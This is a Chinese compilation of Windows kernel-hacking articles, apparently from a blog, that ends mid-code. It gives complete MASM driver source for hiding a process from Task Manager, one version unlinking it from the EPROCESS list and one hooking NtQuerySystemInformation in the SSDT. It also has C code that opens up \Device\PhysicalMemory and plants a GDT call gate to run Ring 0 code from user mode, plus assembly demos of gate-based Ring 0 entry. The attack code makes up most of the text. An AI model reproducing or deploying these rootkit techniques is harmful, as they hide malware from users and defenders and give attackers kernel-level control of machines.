楚狂人大侠的系列教程:
《文件系统驱动开发教程》
Windows TDI过滤驱动开发(电子书)
DriverNetworks开发网络驱动教材(0-7课)
上面这些在驱动开发论坛上都可以找到http://bbs.driverdevelop.com/index.php
看这些书之前我感觉最好对WDM驱动模型有个最基本的了解.
关于WDM的好书:
Walter Oney写的 《Programming the Windows Driver Model》这个在网上可以找到中文版本.
Four-F的驱动开发教程.(这个是专门讲内核驱动的,在asm.yeah.net上可以找到).
好了,以后我发现什么好东西,再告诉大家,如果你发现了好东西,也要记得告诉我哦.
]]>(1).从活动进程链表(ActiveProcessLinks)中摘除自身,这种方法可以欺骗任务管理器,
下面这个程序做的就是双向链表的删除节点和插入节点,十分的简单。
;@echo off
;goto make
;----------------------------------------------------------------------------------------------------
.386
.model flat, stdcall
option casemap:none
;----------------------------------------------------------------------------------------------------
; I N C L U D E F I L E S
;----------------------------------------------------------------------------------------------------
include d:\masm32\include\w2k\ntstatus.inc
include d:\masm32\include\w2k\ntddk.inc
include d:\masm32\include\w2k\ntoskrnl.inc
include d:\masm32\include\w2k\w2kundoc.inc
includelib d:\masm32\lib\w2k\ntoskrnl.lib
include d:\masm32\Macros\Strings.mac
_DriverUnload proto :PDRIVER_OBJECT
_DispatchControlIo proto :PDEVICE_OBJECT,:PIRP
;----------------------------------------------------------------------------------------------------
; C O N S T A N T S
;----------------------------------------------------------------------------------------------------
.const
CCOUNTED_UNICODE_STRING "\\Device\\devHideprocess", g_usDeviceName, 4
CCOUNTED_UNICODE_STRING "\\??\\slHideprocess", g_usSymbolicLinkName, 4
.data
szHide db 'explorer.exe',0
Flink dd ?
Blink dd ?
Explorer dd ?
;----------------------------------------------------------------------------------------------------
; C O D E
;----------------------------------------------------------------------------------------------------
.code
DriverEntry proc uses ebx edi esi, pDriverObject:PDRIVER_OBJECT, pusRegistryPath:PUNICODE_STRING
local status:NTSTATUS
local pDeviceObject:PDEVICE_OBJECT
local dwId,lpEprocess
local ListOffset,NameOffset
local IdOffset
local Version
; int 3
; invoke DbgPrint,$CTA0("\n\nEntry DriverEntry\n\n")
mov status,STATUS_DEVICE_CONFIGURATION_ERROR
invoke IoCreateDevice,pDriverObject,0,addr g_usDeviceName,FILE_DEVICE_UNKNOWN,0,FALSE,addr pDeviceObject
.if eax==STATUS_SUCCESS
mov eax,pDriverObject
assume eax:ptr DRIVER_OBJECT
mov [eax].DriverUnload, offset _DriverUnload
assume eax:nothing
;获得得系统版本
invoke PsGetVersion,NULL,addr Version,NULL,NULL
mov eax,Version
cmp eax,0
jne l1
mov ListOffset,0A0h
mov NameOffset,1fch
jmp l2
l1: cmp eax,1
jne exit
mov ListOffset,88h
mov NameOffset,174h
l2: invoke PsGetCurrentProcessId
mov dwId,eax
invoke PsLookupProcessByProcessId,dwId,addr lpEprocess
mov esi,lpEprocess
add esi,ListOffset
mov edi,esi
assume edi:PLIST_ENTRY
assume esi:PLIST_ENTRY
l3: mov edx,[esi].Flink
;比较是否为最后一个EPROCESS
cmp edx,edi
je l4
assume esi:nothing
sub esi,ListOffset
add esi,NameOffset
invoke strcmp,esi,addr szHide
.if eax == 0
sub esi,NameOffset
add esi,ListOffset
mov Explorer,esi
assume esi:PLIST_ENTRY
assume ebx:PLIST_ENTRY
assume eax:PLIST_ENTRY
;删除节点
mov eax,[esi].Flink
mov ebx,[esi].Blink
mov [ebx].Flink,eax
mov [eax].Blink,ebx
mov Flink,eax
mov Blink,ebx
assume eax:nothing
assume ebx:nothing
invoke DbgPrint,$CTA0("\n\n************hide process successful ***********\n\n")
jmp l4
.endif
;恢复EPROCESS指针
sub esi,NameOffset
add esi,ListOffset
assume esi:PLIST_ENTRY
mov esi,[esi].Flink
jmp l3
l4:
assume esi:nothing
assume edi:nothing
mov status,STATUS_SUCCESS
exit:
.endif
mov eax,status
ret
mov eax,STATUS_DEVICE_CONFIGURATION_ERROR
ret
DriverEntry endp
;----------------------------------------------------------------------------------------------------
; D R I V E R U N L O A D
;----------------------------------------------------------------------------------------------------
_DriverUnload proc pDriverObject:PDRIVER_OBJECT
; int 3
; invoke DbgPrint,$CTA0("\n\nEntry DriverUnload\n\n")
pushad
mov eax,Flink
mov ebx,Explorer
assume ebx:PLIST_ENTRY
assume eax:PLIST_ENTRY
;恢复被摘除的节点
mov [eax].Blink,ebx
mov [ebx].Flink,eax
mov eax,Blink
mov [eax].Flink,ebx
mov [ebx].Blink,eax
popad
;清除符号连接
invoke IoDeleteSymbolicLink,addr g_usSymbolicLinkName
mov eax, pDriverObject
;删除在初始化创建的设备
invoke IoDeleteDevice,(DRIVER_OBJECT PTR [eax]).DeviceObject
ret
_DriverUnload endp
;----------------------------------------------------------------------------------------------------
; E N D
;----------------------------------------------------------------------------------------------------
end DriverEntry
:make
set path=%path%;d:\masm32\bin
set drv=hideprocess
ml /nologo /c /coff %drv%.bat
link /nologo /driver /base:0x10000 /align:32 /out:%drv%.sys /subsystem:native %drv%.obj
del %drv%.obj
echo.
pause
;****************************************************************************************************
(2).如果你反汇编taskmgr.exe,可以在发现taskmgr.exe是通过NtQuerySystemInformation枚举进程的,
因此可以通过挂钩系统服务NtQuerySystemInformation修改这个函数的行为,从而实现在任务管理器中隐藏进程的目的,下面就是实现代码。
;@echo off
;goto make
.386
.model flat, stdcall
option casemap:none
;----------------------------------------------------------------------------------------------------
; I N C L U D E F I L E S
;----------------------------------------------------------------------------------------------------
include d:\masm32\include\w2k\ntstatus.inc
include d:\masm32\include\w2k\ntddk.inc
include d:\masm32\include\w2k\native.inc
include d:\masm32\include\w2k\ntoskrnl.inc
includelib d:\masm32\lib\w2k\ntoskrnl.lib
include d:\masm32\Macros\Strings.mac
;----------------------------------------------------------------------------------------------------
; D A T A
;----------------------------------------------------------------------------------------------------
.data
;保存地址
dwOldNtQuerySystemInformation dd ?
dwAddr dd ?
;----------------------------------------------------------------------------------------------------
; C O N S T A N T S
;----------------------------------------------------------------------------------------------------
.const
CCOUNTED_UNICODE_STRING "\\Device\\devHideprocess", g_usDeviceName, 4
CCOUNTED_UNICODE_STRING "\\??\\slHideprocess", g_usSymbolicLinkName, 4
CCOUNTED_UNICODE_STRING "explorer.exe", processname, 4
;----------------------------------------------------------------------------------------------------
; C O D E
;----------------------------------------------------------------------------------------------------
.code
NewNtQuerySystemInformation proc SysInfoClass,lpSysInfo,SysInfoL,Return
invoke NtQuerySystemInformation,SysInfoClass,lpSysInfo,SysInfoL,Return
pushad
test eax,eax
jnz exit
.if SysInfoClass == SystemProcessesAndThreadsInformation
mov esi,lpSysInfo
mov ebx,esi
add esi,[esi]
@@: add esi,38h ;在38h偏移处取得进程名字。
invoke RtlCompareUnicodeString,addr processname, esi, 1
.if eax== 0
invoke DbgPrint, $CTA0("\nsuccessful \n")
.if dword ptr[esi-38h] == 0
mov dword ptr[ebx],0
jmp exit
.else
sub esi,38h
mov edx,[esi]
add [ebx],edx
add esi,[esi]
jmp @B
.endif
.else
sub esi,38h
cmp dword ptr[esi],0
jz exit
mov ebx,esi
add esi,[esi]
jmp @B
.endif
.endif
exit: popad
ret
NewNtQuerySystemInformation endp
;----------------------------------------------------------------------------------------------------
; H O O K F U N C
;----------------------------------------------------------------------------------------------------
HookFunction proc
pushad
; int 3
; invoke DbgPrint, $CTA0("\nEntry into hoookfunction\n")
;下面是用KeServiceDescriptorTabled导出符号获得数组的基地址,这个数组中包含有NtXXXX函数的入口地址。
mov eax, [KeServiceDescriptorTable]
mov esi, [eax]
mov esi, [esi]
;下面五句为获取ZwQuerySystemInformation的地址
mov eax,ZwQuerySystemInformation
inc eax
inc eax
mov eax,[eax]
mov eax,[eax]
inc eax
movzx ecx,byte ptr[eax]
sal ecx,2
add esi,ecx
mov dwAddr,esi
mov edi,dword ptr[esi]
;保存旧的函数地址。
mov dwOldNtQuerySystemInformation,edi
mov edi,offset NewNtQuerySystemInformation
;修改入口地址
cli
mov dword ptr[esi],edi
sti
popad
mov eax, STATUS_SUCCESS
ret
HookFunction endp
;----------------------------------------------------------------------------------------------------
; DriverUnload
;----------------------------------------------------------------------------------------------------
DriverUnload proc pDriverObject:PDRIVER_OBJECT
;必须保存环境,否则后果很严重。在这个函数中恢复被修改的地址。
pushad
; int 3
; invoke DbgPrint, $CTA0("\nEntry into DriverUnload \n")
mov esi,dwAddr
mov eax,dwOldNtQuerySystemInformation
cli
mov dword ptr[esi],eax
sti
invoke IoDeleteSymbolicLink, addr g_usSymbolicLinkName
mov eax,pDriverObject
invoke IoDeleteDevice, (DRIVER_OBJECT PTR [eax]).DeviceObject
popad
ret
DriverUnload endp
;----------------------------------------------------------------------------------------------------
; D R I V E R E N T R Y
;----------------------------------------------------------------------------------------------------
DriverEntry proc pDriverObject:PDRIVER_OBJECT, pusRegistryPath:PUNICODE_STRING
local status:NTSTATUS
local pDeviceObject:PDEVICE_OBJECT
; int 3
; invoke DbgPrint, $CTA0("\nEntry into DriverEntry\n")
mov status, STATUS_DEVICE_CONFIGURATION_ERROR
invoke IoCreateDevice, pDriverObject, 0, addr g_usDeviceName, FILE_DEVICE_UNKNOWN, 0, FALSE, addr pDeviceObject
.if eax == STATUS_SUCCESS
mov eax, pDriverObject
assume eax:ptr DRIVER_OBJECT
mov [eax].DriverUnload, offset DriverUnload
assume eax:nothing
invoke HookFunction
mov status, STATUS_SUCCESS
.endif
mov eax, status
ret
DriverEntry endp
end DriverEntry
;----------------------------------------------------------------------------------------------------
; E N D
;----------------------------------------------------------------------------------------------------
:make
set drv=hideprocess
d:\masm32\bin\ml /nologo /c /coff %drv%.bat
d:\masm32\bin\link /nologo /driver /base:0x10000 /align:32 /out:%drv%.sys /subsystem:native %drv%.obj
del %drv%.obj
echo.
pause
参考:
(1) Windows2000 内核级进程隐藏、侦测技术
(2) A portable Win32 userland rootkit
大家知道,Windows NT/2000为实现其可靠性,严格将系统划分为内核模式与用户模式,在i386系统中分别对应CPU的Ring0与Ring3级别。Ring0下,可以执行特权级指令,对任何I/O设备都有访问权等等。要实现从用户态进入核心态,即从Ring 3进入Ring 0必须借助CPU的某种门机制,如中断门、调用门等。而Windows NT/2000提供用户态执行系统服务(Ring 0例程)的此类机制即System Service的int 2eh中断服务等,严格的参数检查,只能严格的执行Windows NT/2000提供的服务,而如果想执行用户提供的Ring 0代码(指运行在Ring 0权限的代码),常规方法似乎只有编写设备驱动程序。本文将介绍一种在用户态不借助任何驱动程序执行Ring0代码的方法。
Windows NT/2000将设备驱动程序调入内核区域(常见的位于地址0x80000000上),由DPL为0的GDT项8,即cs为8时实现Ring 0权限。本文通过在系统中构造一个指向我们的代码的调用门(CallGate),实现Ring0代码。基于这个思路,为实现这个目的主要是构造自己的CallGate。CallGate由系统中叫Global Descriptor Table(GDT)的全局表指定。GDT地址可由i386指令sgdt获得(sgdt不是特权级指令,普通Ring 3程序均可执行)。GDT地址在Windows NT/2000保存于KPCR(Processor Control Region)结构中(见《再谈Windows NT/2000环境切换》)。GDT中的CallGate是如下的格式:
typedef struct
{
unsigned short offset_0_15;
unsigned short selector;
unsigned char param_count : 4;
unsigned char some_bits : 4;
unsigned char type : 4;
unsigned char app_system : 1;
unsigned char dpl : 2;
unsigned char present : 1;
unsigned short offset_16_31;
} CALLGATE_DESCRIPTOR;
GDT位于内核区域,一般用户态的程序是不可能对这段内存区域有直接的访问权。幸运的是Windows NT/2000提供了一个叫PhysicalMemory的Section内核对象位于\Device的路径下。顾名思义,通过这个Section对象可以对物理内存进行操作。用objdir.exe对这个对象分析如下:
C:\NTDDK\bin>objdir /D \Device
PhysicalMemory
Section
DACL -
Ace[ 0] - Grant - 0xf001f - NT AUTHORITY\SYSTEM
Inherit:
Access: 0x001F and ( D RCtl WOwn WDacl )
Ace[ 1] - Grant - 0x2000d - BUILTIN\Administrators
Inherit:
Access: 0x000D and ( RCtl )
从dump出的这个对象DACL的Ace可以看出默认情况下只有SYSTEM用户才有对这个对象的读写权限,即对物理内存有读写能力,而Administrator只有读权限,普通用户根本就没有权限。不过如果我们有Administrator权限就可以通过GetSecurityInfo、SetEntriesInAcl与SetSecurityInfo这些API来修改这个对象的ACE。这也是我提供的代码需要Administrator的原因。实现的代码如下:
VOID SetPhyscialMemorySectionCanBeWrited(HANDLE hSection)
{
PACL pDacl=NULL;
PACL pNewDacl=NULL;
PSECURITY_DESCRIPTOR pSD=NULL;
DWORD dwRes;
EXPLICIT_ACCESS ea;
if(dwRes=GetSecurityInfo(hSection,SE_KERNEL_OBJECT,DACL_SECURITY_INFORMATION,
NULL,NULL,&pDacl,NULL,&pSD)!=ERROR_SUCCESS)
{
printf( "GetSecurityInfo Error %u\n", dwRes );
goto CleanUp;
}
ZeroMemory(&ea, sizeof(EXPLICIT_ACCESS));
ea.grfAccessPermissions = SECTION_MAP_WRITE;
ea.grfAccessMode = GRANT_ACCESS;
ea.grfInheritance= NO_INHERITANCE;
ea.Trustee.TrusteeForm = TRUSTEE_IS_NAME;
ea.Trustee.TrusteeType = TRUSTEE_IS_USER;
ea.Trustee.ptstrName = "CURRENT_USER";
if(dwRes=SetEntriesInAcl(1,&ea,pDacl,&pNewDacl)!=ERROR_SUCCESS)
{
printf( "SetEntriesInAcl %u\n", dwRes );
goto CleanUp;
}
if(dwRes=SetSecurityInfo(hSection,SE_KERNEL_OBJECT,DACL_SECURITY_INFORMATION,NULL,NULL,pNewDacl,NULL)!=ERROR_SUCCESS)
{
printf("SetSecurityInfo %u\n",dwRes);
goto CleanUp;
}
CleanUp:
if(pSD)
LocalFree(pSD);
if(pNewDacl)
LocalFree(pSD);
}
这段代码对给定HANDLE的对象增加了如下的ACE:
PhysicalMemory
Section
DACL -
Ace[ 0] - Grant - 0x2 - WEBCRAZY\Administrator
Inherit:
Access: 0x0002 //SECTION_MAP_WRITE
这样我们在有Administrator权限的条件下就有了对物理内存的读写能力。但若要修改GDT表实现Ring 0代码。我们将面临着另一个难题,因为sgdt指令获得的GDT地址是虚拟地址(线性地址),我们只有知道GDT表的物理地址后才能通过\Device\PhysicalMemory对象修改GDT表,这就牵涉到了线性地址转化成物理地址的问题。我们先来看一看Windows NT/2000是如何实现这个的:
kd> u nt!MmGetPhysicalAddress l 30
ntoskrnl!MmGetPhysicalAddress:
801374e0 56 push esi
801374e1 8b742408 mov esi,[esp+0x8]
801374e5 33d2 xor edx,edx
801374e7 81fe00000080 cmp esi,0x80000000
801374ed 722c jb ntoskrnl!MmGetPhysicalAddress+0x2b (8013751b)
801374ef 81fe000000a0 cmp esi,0xa0000000
801374f5 7324 jnb ntoskrnl!MmGetPhysicalAddress+0x2b (8013751b)
801374f7 39153ce71780 cmp [ntoskrnl!MmKseg2Frame (8017e73c)],edx
801374fd 741c jz ntoskrnl!MmGetPhysicalAddress+0x2b (8013751b)
801374ff 8bc6 mov eax,esi
80137501 c1e80c shr eax,0xc
80137504 25ffff0100 and eax,0x1ffff
80137509 6a0c push 0xc
8013750b 59 pop ecx
8013750c e8d3a7fcff call ntoskrnl!_allshl (80101ce4)
80137511 81e6ff0f0000 and esi,0xfff
80137517 03c6 add eax,esi
80137519 eb17 jmp ntoskrnl!MmGetPhysicalAddress+0x57 (80137532)
8013751b 8bc6 mov eax,esi
8013751d c1e80a shr eax,0xa
80137520 25fcff3f00 and eax,0x3ffffc
80137525 2d00000040 sub eax,0x40000000
8013752a 8b00 mov eax,[eax]
8013752c a801 test al,0x1
8013752e 7506 jnz ntoskrnl!MmGetPhysicalAddress+0x44 (80137536)
80137530 33c0 xor eax,eax
80137532 5e pop esi
80137533 c20400 ret 0x4
从这段汇编代码可看出如果线性地址在0x80000000与0xa0000000范围内,只是简单的进行移位操作(位于801374ff-80137519指令间),并未查页表。我想Microsoft这样安排肯定是出于执行效率的考虑。这也为我们指明了一线曙光,因为GDT表在Windows NT/2000中一般情况下均位于这个区域(我不知道/3GB开关的Windows NT/2000是不是这种情况)。
经过这样的分析,我们就可以只通过用户态程序修改GDT表了。而增加一个CallGate就不是我可以介绍的了,找本Intel手册自己看一看了。具体实现代码如下:
typedef struct gdtr {
short Limit;
short BaseLow;
short BaseHigh;
} Gdtr_t, *PGdtr_t;
ULONG MiniMmGetPhysicalAddress(ULONG virtualaddress)
{
if(virtualaddress<0x80000000||virtualaddress>=0xA0000000)
return 0;
return virtualaddress&0x1FFFF000;
}
BOOL ExecRing0Proc(ULONG Entry,ULONG seglen)
{
Gdtr_t gdt;
__asm sgdt gdt;
ULONG mapAddr=MiniMmGetPhysicalAddress(gdt.BaseHigh<<16U|gdt.BaseLow);
if(!mapAddr) return 0;
HANDLE hSection=NULL;
NTSTATUS status;
OBJECT_ATTRIBUTES objectAttributes;
UNICODE_STRING objName;
CALLGATE_DESCRIPTOR *cg;
status = STATUS_SUCCESS;
RtlInitUnicodeString(&objName,L"\\Device\\PhysicalMemory");
InitializeObjectAttributes(&objectAttributes,
&objName,
OBJ_CASE_INSENSITIVE | OBJ_KERNEL_HANDLE,
NULL,
(PSECURITY_DESCRIPTOR) NULL);
status = ZwOpenSection(&hSection,SECTION_MAP_READ|SECTION_MAP_WRITE,&objectAttributes);
if(status == STATUS_ACCESS_DENIED){
status = ZwOpenSection(&hSection,READ_CONTROL|WRITE_DAC,&objectAttributes);
SetPhyscialMemorySectionCanBeWrited(hSection);
ZwClose(hSection);
status =ZwOpenSection(&hSection,SECTION_MAP_WRITE|SECTION_MAP_WRITE,&objectAttributes);
}
if(status != STATUS_SUCCESS)
{
printf("Error Open PhysicalMemory Section Object,Status:%08X\n",status);
return 0;
}
PVOID BaseAddress;
BaseAddress=MapViewOfFile(hSection,
FILE_MAP_READ|FILE_MAP_WRITE,
0,
mapAddr, //low part
(gdt.Limit+1));
if(!BaseAddress)
{
printf("Error MapViewOfFile:");
PrintWin32Error(GetLastError());
return 0;
}
BOOL setcg=FALSE;
for(cg=(CALLGATE_DESCRIPTOR *)((ULONG)BaseAddress+(gdt.Limit&0xFFF8));(ULONG)cg>(ULONG)BaseAddress;cg--)
if(cg->type == 0){
cg->offset_0_15 = LOWORD(Entry);
cg->selector = 8;
cg->param_count = 0;
cg->some_bits = 0;
cg->type = 0xC; // 386 call gate
cg->app_system = 0; // A system descriptor
cg->dpl = 3; // Ring 3 code can call
cg->present = 1;
cg->offset_16_31 = HIWORD(Entry);
setcg=TRUE;
break;
}
if(!setcg){
ZwClose(hSection);
return 0;
}
short farcall[3];
farcall[2]=((short)((ULONG)cg-(ULONG)BaseAddress))|3; //Ring 3 callgate;
if(!VirtualLock((PVOID)Entry,seglen))
{
printf("Error VirtualLock:");
PrintWin32Error(GetLastError());
return 0;
}
SetThreadPriority(GetCurrentThread(),THREAD_PRIORITY_TIME_CRITICAL);
Sleep(0);
_asm call fword ptr [farcall]
SetThreadPriority(GetCurrentThread(),THREAD_PRIORITY_NORMAL);
VirtualUnlock((PVOID)Entry,seglen);
//Clear callgate
*(ULONG *)cg=0;
*((ULONG *)cg+1)=0;
ZwClose(hSection);
return TRUE;
}
我在提供的代码中演示了对Control Register与I/O端口的操作。CIH病毒在Windows 9X中就是因为获得Ring 0权限才有了一定的危害,但Windows NT/2000毕竟不是Windows 9X,她已经有了比较多的安全审核机制,本文提供的代码也要求具有Administrator权限,但如果系统存在某种漏洞,如缓冲区溢出等等,还是有可能获得这种权限的,所以我不对本文提供的方法负有任何的责任,所有讨论只是一个技术热爱者在讨论技术而已。谢谢!
参考资料:
1.Intel Corp<
关于进入RING0层的方法,大家一定听说过不少,我在复习保护模式编程中将一些进RING0
的方法;总结了一下,包括调用门,任务门,中断门,陷阱门等,这些方法都是直接利用
IA32的方法,所以和操作系统应该没有多大关系,当然由于NT内核对GDT,IDT,的保护所
以我们不能用这些方法,不过如果一旦突破了NT的保护,那么所有的方法就都可以使用了,
其他的还有SEH等方法,我在前面的文章中也有介绍。
-----------------Code---
;========================================
; WOWOCOCK 编写 ;
;========================================
.586p
.model flat, stdcall
option casemap :none ; case sensitive
include \masm32\include\windows.inc
include \masm32\include\kernel32.inc
include \masm32\include\user32.inc
includelib \masm32\lib\kernel32.lib
includelib \masm32\lib\user32.lib
;;--------------
TSS STRUC
TRLink dw 0 ;链接字段
dw 0 ;不使用,置为0
TRESP0 dd 0 ;0级堆栈指针
TRSS0 dw 0 ;0级堆栈段寄存器
dw 0 ;不使用,置为0
TRESP1 dd 0 ;1级堆栈指针
TRSS1 dw 0 ;1级堆栈段寄存器
dw 0 ;不使用,置为0
TRESP2 dd 0 ;2级堆栈指针
TRSS2 dw 0 ;2级堆栈段寄存器
dw 0 ;不使用,置为0
TRCR3 dd 0 ;CR3
TREIP dd 0 ;EIP
TREFlag dd 0 ;EFLAGS
TREAX dd 0 ;eax
TRECX dd 0 ;ecx
TREDX dd 0 ;edx
TREBX dd 0 ;ebx
TRESP dd 0 ;esp
TREBP dd 0 ;ebp
TRESI dd 0 ;esi
TREDI dd 0 ;edi
TRES dw 0 ;ES
dw 0 ;不使用,置为0
TRCS dw 0 ;CS
dw 0 ;不使用,置为0
TRSS dw 0 ;ss
dw 0 ;不使用,置为0
TRDS dw 0 ;DS
dw 0 ;不使用,置为0
TRFS dw 0 ;FS
dw 0 ;不使用,置为0
TRGS dw 0 ;GS
dw 0 ;不使用,置为0
TRLDTR dw 0 ;LDTR
dw 0 ;不使用,置为0
TRTrip dw 0 ;调试陷阱标志(只用位0)
TRIOMap dw $+2 ;指向I/O许可位图区的段内偏移
TSS ENDS
.data
sztit db "Gate Test",0
CTEXTCall db "call gate to Ring0!继续?",0
CTEXTInt db "int gate to Ring0 By int 5 !继续?",0
CTEXTIntx db "int gate to Ring0 By int X !继续?",0
CTEXTTrap db "Trap gate to Ring0 By int 1!继续?",0
CTEXTFault db "Fault gate to Ring0!继续?",0
CTEXTTask db "Task gate to Ring0!继续?",0
temp1 db "Cr3的内容是:%8X",0
temp2 db 100 dup(?)
Freq db 08h ;发声频率
gdtR df 0
idtR df 0
ldtR dw 0
trR dw 0 ;the contents of GDTR,IDTR,LDTR,TR
ldtDes dw 0
dw 0 ;LDT Limit
dd 0 ;LDT Base
Callgt dq 0 ;call gate's sel:off
TrDes dw 0
dw 0 ;TR Limit
dd 0 ;TR Base
Tss1Sel dw ? ;TSS
Call32 dd 0
Tss1Gate dw ? ;任务门
TSS1 TSS <>
Tss1Limit equ $-TSS1
TSS2 TSS <>
TestCR3 dd 4
MyCall MACRO Selector,Offsetv
db 09ah
dd Offsetv
dw Selector
ENDM
;;-----------------------------------------
.code
__Start:
sgdt fword ptr gdtR
sidt fword ptr idtR
sldt word ptr ldtR
str word ptr trR ;save them for later use
;-----------------------
; get the ldt mes
;-----------------------
movzx esi,ldtR
add esi,dword ptr [gdtR+2] ;esi->ldt descriptor
mov ax,word ptr [esi]
mov word ptr [ldtDes],ax
mov ax,word ptr [esi+6]
and ax,0fh
mov word ptr [ldtDes+2],ax ;get ldt Limit
mov eax,[esi+2]
and eax,0ffffffh
mov ebx,[esi+4]
and ebx,0ff000000h
or eax,ebx
mov dword ptr [ldtDes+4],eax ;get ldt Base
;-----------------------
; get the tr mes
;-----------------------
movzx esi,trR
add esi,dword ptr [gdtR+2]
mov ax,word ptr [esi]
mov word ptr [TrDes],ax
mov ax,word ptr [esi+6]
and ax,0fh
mov word ptr [TrDes+2],ax ;get tr Limit
mov eax,[esi+2]
and eax,0ffffffh
mov ebx,[esi+4]
and ebx,0ff000000h
or eax,ebx
mov dword ptr [TrDes+4],eax;get tr Base
;-------------------------------------
; 这里演示在GDT中寻找空白表项来制造调用门
;-------------------------------------
mov esi,dword ptr [gdtR+2] ;esi->gdt base
movzx eax,word ptr [gdtR] ;eax=gdt limit
call Search_XDT
;esi==gdt Base
mov esi,dword ptr [gdtR+2]
push offset myring0_prc_callgt ;set callgate in gdt
pop word ptr [esi+eax+0]
pop word ptr [esi+eax+6] ;offset
mov word ptr [esi+eax+2],28h
mov word ptr [esi+eax+4],0EC00h
;sel=28h,dpl=3,and attribute ->386 call gate!
and dword ptr Callgt,0
or al,3h
mov word ptr [Callgt+4],ax
call fword ptr [Callgt] ;use callgate to Ring0!
;--------------------------------------------
; 这里演示在Ldt中制造调用门
;--------------------------------------------
invoke MessageBoxA,0, addr CTEXTCall,addr sztit,MB_YESNO
cmp eax,IDNO
jz @xit000 ;继续演示?
mov esi,dword ptr [ldtDes+4] ;esi->ldt base
mov eax,dword ptr [ldtDes] ;eax=ldt limit
call Search_XDT ;eax返回找到的空白选择子
mov esi,dword ptr [ldtDes+4]
push offset myring0_prc_callgt ;set callgate in ldt
pop word ptr [esi+eax+0]
pop word ptr [esi+eax+6] ;offset
mov word ptr [esi+eax+2],28h
mov word ptr [esi+eax+4],0EC00h
;sel=28h,dpl=3,and attribute ->386 call gate!
and dword ptr Callgt,0
or al,7h ;所以选择子一定要指向LDT
mov word ptr [Callgt+4],ax
call fword ptr [Callgt] ;use callgate to Ring0!
; *通过中断门进入ring0,像在Dos下一样,我们只要替换中断向量表的地址以指向我们
; *自己的程序就可以了,不过在win下中断向量表变为IDT(中断描述符表),其第0~1保存
; *中断处理程序偏移的低16位,6~7字节保存偏移的高16位,我们必须使用描述符具有DPL=3
; *的中断门以便在ring3下转入中断程序,而int 03h,04h,05h,10h,13h,30h等本来就是
; *DPL=3,我们可以方便地利用之,注意中断处理程序返回用iretd
;---------------------------
; 下面利用int 5进入ring0
;---------------------------
invoke MessageBoxA,0,addr CTEXTInt,addr sztit,MB_YESNO
cmp eax,IDNO
jz @xit000 ;继续演示?
mov esi,dword ptr [idtR+2] ;esi->idt base
push dword ptr [esi+8*5+0]
push dword ptr [esi+8*5+4] ;保存INT 5,中断描述符
push offset myring0_prc_Intgt ;替换原来INT5的入口地址
pop word ptr [esi+8*5]
pop word ptr [esi+8*5+6]
int 5 ;进入ring0!
;int 3 ;//可选择利用int 3
;db 0CCh ;//则保存和恢复就改为8*3
;为了增强反跟踪效果
;当然也可以利用int 1,方法一致不过可能在某些处理器上冲突
pop dword ptr [esi+8*5+4] ;恢复,int 5,中断描述符
pop dword ptr [esi+8*5+0]
; *当然,上面使用的全部是DPL=3的int如1,3,5等,如果我们准备使用任意int 来达到
; *目的该怎么办?这就需要自己改int descriptor 的属性值,使DPL=3,sel=28h
; *如下面使用int 255
; *__________________________________________
invoke MessageBoxA,0,addr CTEXTIntx,addr sztit,MB_YESNO
cmp eax,IDNO
jz @xit000 ;继续演示?
movzx ebx,word ptr [idtR] ;ebx=idt limit
sub ebx,7
push dword ptr [esi+ebx+0] ; save IDT entry
push dword ptr [esi+ebx+4]
push offset myring0_prc_Intgt
pop word ptr [esi+ebx+0]
mov word ptr [esi+ebx+2],28h ;ring0 Sel
mov word ptr [esi+ebx+4],0EE00h ;P=1,386中断门,DPL=3
pop word ptr [esi+ebx+6]
;mov eax,ebx
;shl eax,5
;add eax,90C300CDh
;push eax
;call ss:esp ; 在堆栈中形成指令 int 5Fh ret直接转入执行!
int 5fh
;pop eax ; int调用,酷吧!
pop dword ptr [esi+ebx+4]; 恢复
pop dword ptr [esi+ebx+0]
; *
; *还有其他的方法进入ring0,如陷阱门,与中断门基本一致,只不过是让硬件自己产生中断
; *我们则自己置TF=1引发之,注意在中断处理中关闭TF,否则会造成死循环,不断单步,还有故,
; *障门产生故障之后注意cs:eip已经压入堆栈,如果不改指令的话,就得自己修改eip指向安全
; *地址故障门的好处在于不必自己置sel为28h,也不必担心DPL=0,操作系统为我们准备好了一
; *切我们只要替换int处理地址就行了,以下是简单例子
; *__________________________________________
invoke MessageBoxA,0,addr CTEXTTrap,addr sztit,MB_YESNO
cmp eax,IDNO
jz @xit001 ;继续演示?
;---------------------------------
; int1 单步陷阱或者int4 除法溢出陷阱
; 这里演示int 1,int 4类似
; 这个和上面的有不同吗,有!就是int 1
; 是由CPU而不是我们显式用int 1指令引发
;---------------------------------
push dword ptr [esi+(8*1)+0] ; 保存原int 1
push dword ptr [esi+(8*1)+4]
push offset myring0_prc_Trapgt
pop word ptr [esi+(8*1)+0]
pop word ptr [esi+(8*1)+6]
pushfd
pop eax
or ah,1
push eax
popfd ; set TF=1
nop ; ring0!
pop dword ptr [esi+(8*1)+4]; restore IDT entry
pop dword ptr [esi+(8*1)+0]
;--------------------------------------------
; 这里演示故障门,除法错误
;--------------------------------------------
@xit001:invoke MessageBoxA,0,addr CTEXTFault,addr sztit,MB_YESNO
cmp eax,IDNO
jz @xit000 ;继续演示?
push dword ptr [esi+(8*0)+0] ;
push dword ptr [esi+(8*0)+4]
push offset Ring0Code_div
pop word ptr [esi+(8*0)+0]
pop word ptr [esi+(8*0)+6]
xor eax,eax
div eax ; 除法错误,进入故障门ring0!
;-----------------------------------------
invoke MessageBoxA,0,addr CTEXTTask,addr sztit,MB_YESNO
cmp eax,IDNO
jz @xit000
;-------------------------------------
; 这里演示在GDT中寻找空白表项来制造TSS
;-------------------------------------
mov esi,dword ptr [gdtR+2]
movzx eax,word ptr [gdtR]
call Search_XDT
and ax,0fff8h
mov Tss1Sel,ax ;save Tss1 selector ,esi==gdt Base
mov esi,dword ptr [gdtR+2]
mov ebx,offset TSS1
mov word ptr [esi+eax+0],Tss1Limit
mov dword ptr [esi+eax+2],ebx ;offset
mov word ptr [esi+eax+5],89h
shr ebx,24
mov byte ptr [esi+eax+7],bl ;set mytss
;--------------------------------------------
; 这里演示在Ldt中制造任务门
;--------------------------------------------
mov esi,dword ptr [ldtDes+4]
mov eax,dword ptr [ldtDes]
call Search_XDT ;eax返回找到的空白选择子
push eax
or ax,7h
mov Tss1Gate,ax
pop eax
mov esi,dword ptr [ldtDes+4]